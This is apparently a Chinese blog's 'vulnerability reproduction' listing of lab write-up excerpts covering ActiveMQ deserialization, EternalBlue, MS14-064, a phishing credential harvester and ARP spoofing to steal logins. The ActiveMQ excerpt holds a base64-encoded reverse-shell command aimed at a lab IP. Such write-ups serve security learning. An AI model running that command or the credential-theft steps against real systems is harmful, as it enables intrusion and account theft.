漏洞复现
文章平均质量分 54
复现漏洞,学习漏洞的基础知识,以及学习中遇到的安全类问题
我是你彬哥
这个作者很懒,什么都没留下…
展开
-
CVE-2015-5254(ActiveMQ-反序列化漏洞)
因此这条消息就是bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNDIuMTMwLzkwMDEgMD4mMQ==}|{base64,-d}|{bash,-i}"监听了61616和8161端口,其中61616是工作端口,消息就在这个端口进行传递;8161是web管理页面的端口,访问127.0.0.1:8186即可访问,不过这个漏洞理论上不需要web的。,或者使用云悉指纹识别,我这里是本地,云悉是不可以识别本地的。3、访问web管理页面,读取消息,触发漏洞。原创 2024-09-13 10:39:45 · 613 阅读 · 0 评论 -
永恒之蓝ms17-010
永恒之蓝爆发于2017年4月14日晚,是一种利用Windows系统smb服务的漏洞原创 2024-09-12 13:48:19 · 130 阅读 · 0 评论 -
社会工程学盗取账密
6)随后访问攻击机IP,并且点击这个生成的网址,这里访问的就是工具自动生成的网页,登录账号密码后攻击机就显示了账号密码,随后会跳转到goole网站的页面,但是并没有登录。5)需要首先填入攻击机的IP,填kali的IP即可,我的是192.168.234.129,回车随后选择模版,这里我选择goole模版,回车后监听开启。3)选择2)网站攻击向量,随后选择3)凭证收割机攻击方法,这里是使用给定的网站,以欺骗用户输入个人敏感信息,如用户名、密码等。2)选择1)进入社会工程学攻击模块。图1-6 浏览器访问页面。原创 2023-11-05 03:00:50 · 84 阅读 · 0 评论 -
ARP欺骗盗取账密
通过工具arpspoof实现ARP欺骗,使用wireshark截取靶机登录数据包窃取隐私数据。通过工具arpspoof和wireshark的搭配使用,成功截取目标输入的账号以及密码。通过ARP欺骗学习有关ARP协议相关知识。Kali、Windows靶机。原创 2023-11-27 10:33:01 · 118 阅读 · 0 评论 -
MS14-064/CVE-2014-6332漏洞复现(OLE远程代码执行漏洞、IE浏览器漏洞)
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。show options:查看需要设置的地方。原创 2024-04-24 11:33:24 · 411 阅读 · 4 评论